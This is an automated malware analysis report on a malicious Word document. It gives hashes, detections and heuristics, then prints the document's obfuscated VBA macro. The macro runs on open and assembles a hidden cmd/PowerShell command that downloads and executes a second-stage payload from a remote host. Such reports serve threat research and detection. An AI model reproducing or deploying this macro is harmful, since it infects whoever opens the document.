Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5fd8aa870702becb…

MALICIOUS

Office (OLE)

63.5 KB Created: 2018-09-07 07:42:00 Authoring application: Microsoft Office Word First seen: 2019-10-01
MD5: fcc32139840e34c1dc9fc3759262c73e SHA-1: 1b215e5a013667b9b1cefdb56a30fc93fed790a6 SHA-256: 5fd8aa870702becb2c472968b66a87227d2457f59ea13f339ea01daae5736b62
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

This Office document contains VBA macros, including a Document_Open macro that utilizes the Shell() function. The script appears to be obfuscated but its intent is to download and execute a second-stage payload. The ClamAV detection name 'Doc.Trojan.Agent-6922859-0' further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Agent-6922859-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Agent-6922859-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4783 bytes
SHA-256: 27738129b68d89ba5372ddff14ee59c53b1089912cdd7084a66773865a6fcfaf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "arLYMdDLmZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Month Format("uU" + "kzd")
   Month Format("LlzVBGiFY" + "ISE" + "1163" + "jmR")
   Month Format("14050696" + "uEAnTljwL")
   Month Format("alcqW" + "wJYf" + "tYGKfJdTssqcK" + "nlKrnhPzTGX")
   Month Format("501120407" + "8096")
   Month Format("1975" + "tJ")
Shell Format(zQoczKWl) + Format(tvWOsTLnuTOj) + Format(GlLBQXf) + omzVXopfMvA + qbwGjNv + Format(jcvzWsAJ) + Format(bSYLRobSAm), Format(vbHide)
   Month Format("zVV" + "350569193")
End Sub



Attribute VB_Name = "zidFqDEG"
Function omzVXopfMvA()

On _
Error _
Resume _
Next
Month Format("Jv" + "TSkqZ" + "mHPdmGrmb" + "422056978")
   Month Format("253972228" + "483745372")
   Month Format("mw" + "T" + "NVZcwY" + "D")
   Month Format("5866" + "pX")
NSzisMl = Chr(2 + 14 + 1 + 17 + 65) + "md /V^" + ":^ON/" + Chr(1 + 10 + 0 + 12 + 44) + Chr(0 + 4 + 0 + 5 + 25) + "^s^e^t " + "T^B" + Chr(2 + 14 + 1 + 17 + 65) + "^O=^" + "  ^ ^ " + " "
Month Format("cqjO" + "dULpwAFPR")
   Month Format("NALwjK" + "YtVc" + "c" + "TjX")
   Month Format("7502" + "NhXihVtzj")
iYznuta = "^  ^ ^ " + "  ^  ^ " + " ^  " + "}" + "}" + "^{^h" + Chr(2 + 14 + 1 + 17 + 65) + "t^" + "a" + Chr(2 + 14 + 1 + 17 + 65) + "}^" + ";k^aer^" + "b^;" + "jQW^$ m" + "^e^t^I"
Month Format("zKUJ" + "P" + "8390" + "ccR")
   Month Format("279268119" + "ULTDXlkl" + "n" + "RNO")
   Month Format("OKcZMvH" + "M" + "INknfzXt" + "94463258")
jRkQlhT = "-^e^k^o" + "vnI" + ";)jQW$" + " ,K^z^" + "q$(^e" + "l^i^F" + "d^ao^" + "ln"
Month Format("tZ" + "7489")
   Month Format("113210660" + "402018979" + "101" + "tvJG")
   Month Format("bmJjP" + "wCw" + "4839" + "150037450")
   Month Format("393803886" + "TLiDilDpS" + "379871918" + "wMiau")
vwCVvu = "^w" + "^o" + "^D^.^" + "PnG^$^" + "{yrt{)" + "^"
Month Format("VFrZ" + "WO" + "EmWmATj" + "or")
   Month Format("2628" + "hjwQBYqRhhTbzK" + "464048509" + "jamFouci")
   Month Format("168335745" + "A" + "OW" + "VH")
   Month Format("ZPNFNnYXMRWw" + "3043")
jCwVEtQq = "EB" + "^O^$" + "^ ni^ " + "^Kzq$(h" + Chr(2 + 14 + 1 + 17 + 65) + "^aer^" + "of" + "^;'ex^"
Month Format("348732138" + "QqVAzOWaXGXVz" + "443206469" + "sAGJ")
ZJkbj = "e^.^'^+" + "In" + "n" + "$^+'" + "\'^" + "+" + Chr(2 + 14 + 1 + 17 + 65) + "^" + "i" + "^l^bu" + "^p^:vn^" + "e$" + "=j^QW" + "$;^'"
Month Format("t" + "nwiCDEE")
sKtbBOVfV = "^0^4^'" + " " + "=^ ^" + "Inn^$;)" + "^'^" + "@'" + "(^t^i" + "^lp^S.^" + "'nk^" + "t.^3^k" + "n^b^k" + "^=" + "^l^?^p"
Month Format("uWUSrrXDh" + "Q")
   Month Format("IHzwhiEEZnULFn" + "855")
iirAQivjXVr = "^h^" + "p^.t^o^" + "ksn" + "a^po/^" + "T^TR/^" + "m" + "^o" + Chr(2 + 14 + 1 + 17 + 65) + ".m" + "6hs^h" + "q" + "p8^3ma^"
Month Format("4234" + "SEwXqo" + "DYbBWcFS" + "tvtHJhjG")
nlObmzNfC = "kf" + "t//^:p" + "^t" + "^t^" + "h'" + "^=E^" + "BO^$" + "^;^" + "t"
omzVXopfMvA = NSzisMl + iYznuta + jRkQlhT + vwCVvu + jCwVEtQq + ZJkbj + sKtbBOVfV + iirAQivjXVr + nlObmzNfC
   Month Format("hz" + "20112209" + "305477354" + "Crzs")
   Month Format("wOf" + "sl" + "331311819" + "U")
End Function
Function qbwGjNv()

On _
Error _
Resume _
Next
Month Format("7827" + "kC" + "3781" + "LwXF")
   Month Format("133721618" + "nqm" + "456421768" + "R")
   Month Format("RkGIV" + "MLkX" + "QZFzpsKJ" + "2499")
uSjLBABM = "n" + "e^i" + "l" + Chr(1 + 10 + 0 + 12 + 44) + "be^W." + "^teN" + " ^t" + Chr(2 + 14 + 1 + 17 + 65) + "ejb^o^" + "-" + "^we" + "n=" + "^P" + "n^G$"
Month Format("ZZsjrWRXQFBFi" + "236509146" + "jr" + "hrzXuG")
   Month Format("j" + "i")
   Month Format("9081" + "8901")
jQbjRtr = "^ lleh" + "sr^ew^" + "op&&for" + " /^" + "L %V ^" + "in (^2^" + "63" + "^;" + "-"
Month Format("fAK" + "2447")
   Month Format("442812728" + "2191")
   Month Format("277144729" + "aHzRiFjDK")
   Month F
... (truncated)